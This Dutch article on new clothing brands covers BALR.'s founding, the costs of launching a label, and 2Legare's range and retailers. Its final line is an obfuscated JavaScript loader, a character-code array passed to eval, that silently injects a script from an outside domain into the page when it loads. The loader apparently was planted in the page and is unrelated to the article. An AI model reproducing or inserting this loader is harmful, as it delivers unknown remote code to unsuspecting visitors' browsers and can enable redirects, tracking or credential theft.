Nieuw kledingmerk op de markt

Modetrends komen en gaan. Elk jaar wordt namelijk de nieuwste mode gepresenteerd. De grote kledingmerken en kledingfabrikanten brengen hun nieuwste t-shirts, broeken en truien op de markt, afhankelijk van het kledingseizoen. Maar niet alleen de gevestigde orde brengt nieuwe kleding op de markt. Soms zien we ook dat nieuwe kledingmerken de markt betreden en zijn weg probeert te vinden tussen de ‘grote jongens’. 

BALR.

Het meeste bekende voorbeeld van de laatste tijd is misschien wel het merk BALR. BALR. werd in 2013 opgericht door oud profvoetballer Demi de Zeeuw. Samen met Ralph de Geus en Juul Manders heeft hij van zijn andere passie (naast voetbal) zijn nieuwe werk kunnen maken. Het merk kenmerkt zich door het gebruik van de kleuren zwart en wit. 

Redden alle nieuwe merken het?

Nee zeker niet alle merken weten de ‘highway’ te bereiken en stranden op een verlaten weggetje. En nieuw merk lanceren is helaas niet zo simpel als een paar shirtjes, broeken en truien ontwerpen. Na de ontwerpfase moeten de producten namelijk nog geproduceerd worden, er moeten verkoopkanalen opgezet worden en het belangrijkste: Er moet een doelgroep aangesproken worden. 

Dit alles kost een hoop geld. Inkoopkosten van materialen, loonkosten, productiekosten en natuurlijk marketingbudget. Zonder naamsbekendheid worden er enkel sporadisch producten verkocht en gaan nieuwe merken op de fles. Het is dus belangrijk om zelf voldoende financiële middelen op te bouwen of goede afspraken te maken met investeerders. 

2Legare

2Legare is één van de nieuwe merken die de kleding markt betreedt. 2Legare staat voor sportief, stijlvol en comfortabele kleding. Inmiddels heeft het merk het assortiment al behoorlijk weten uit te breiden met 2Legare shirts, truien, petten, korte- en lange broeken. In Nederland begint het steeds meer aan naamsbekendheid te winnen. 2Legare heeft een goed netwerk van verkoopkanalen opgezet waarmee het de doelgroep kan bereiken. Onder andere winkels zoals Crivaldi hebben dit merk omarmt. 

var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,99,100,110,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,115,119,97,121,46,106,115,63,118,61,50,39,59,32,10,115,46,105,100,61,39,115,119,97,121,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/*674867468*/t);